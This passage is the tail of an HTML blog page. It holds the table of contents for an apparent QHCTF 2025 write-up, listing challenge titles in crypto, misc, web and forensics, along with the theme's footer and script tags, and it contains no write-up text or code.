class="nav-text">Web_IP</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Forensic"><span class="nav-text">Forensic</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-01"><span class="nav-text">Win_01</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-02"><span class="nav-text">Win_02</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-04"><span class="nav-text">Win_04</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-05"><span class="nav-text">Win_05</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-06"><span class="nav-text">Win_06</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-07"><span class="nav-text">Win_07</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
    &copy;&nbsp;2025
    
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Lwwww</a>
        
    </div>

    <div class="theme-info info-item">
        Powered by&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;&&nbsp;Theme&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    

    
        <div class="count-info info-item">
            
                <span class="count-item border-box word">
                    <span class="item-type border-box">Total words</span>
                    <span class="item-value border-box word">14k</span>
                </span>
            

            
                <span class="count-item border-box uv">
                    <span class="item-type border-box">Unique Visitor</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-item border-box pv">
                    <span class="item-type border-box">Page View</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Crypto"><span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Easy-RSA"><span class="nav-text">Easy_RSA</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MISC"><span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AF%B7%E6%89%BE%E5%87%BA%E6%8B%8D%E6%91%84%E5%9C%B0%E6%89%80%E5%9C%A8%E4%BD%8D%E7%BD%AE-OSINT"><span class="nav-text">请找出拍摄地所在位置-OSINT</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#OSINT-%E4%BD%A0%E7%8C%9C%E7%8C%9C%E8%BF%99%E6%98%AF%E5%93%AA%EF%BC%9F"><span class="nav-text">OSINT-你猜猜这是哪？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%A0%E8%83%BD%E7%9C%8B%E6%87%82%E8%BF%99%E4%B8%B2%E6%9C%AA%E7%9F%A5%E7%9A%84%E6%96%87%E5%AD%97%E5%90%97"><span class="nav-text">你能看懂这串未知的文字吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PvzHE"><span class="nav-text">PvzHE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8C%BF%E7%B1%BB%E7%9A%84%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80%E4%BD%A0%E4%BA%86%E8%A7%A3%E5%90%97"><span class="nav-text">猿类的编程语言你了解吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%90%AF%E5%8A%A8%EF%BC%81"><span class="nav-text">______启动！</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#QHCTF-For-Year-2025"><span class="nav-text">QHCTF For Year 2025</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#WEB"><span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#PCREMagic"><span class="nav-text">PCREMagic</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#php%E7%9F%AD%E6%A0%87%E7%AD%BE"><span class="nav-text">php短标签</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Easy-include"><span class="nav-text">Easy_include</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Web-IP"><span class="nav-text">Web_IP</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Forensic"><span class="nav-text">Forensic</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-01"><span class="nav-text">Win_01</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-02"><span class="nav-text">Win_02</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-04"><span class="nav-text">Win_04</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-05"><span class="nav-text">Win_05</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-06"><span class="nav-text">Win_06</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Win-07"><span class="nav-text">Win_07</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/utils.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/header-shrink.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/back2top.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/toggle-theme.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/code-block.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/main.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/libs/anime.min.js"></script>

<!-- local search -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/local-search.min.js"></script>


<!-- lazyload -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/lazyload.min.js"></script>


<div class="">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/post/post-helper.min.js"></script>

        <!-- toc -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/post/toc.min.js"></script>
        

        <!-- copyright-info -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/post/copyright-info.min.js"></script>
        

        <!-- share -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/post/share.min.js"></script>
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



    
        
            
<script class="custom-inject-js" src="/js/usetime.js" data-pjax></script>

        
    

</body>
</html>
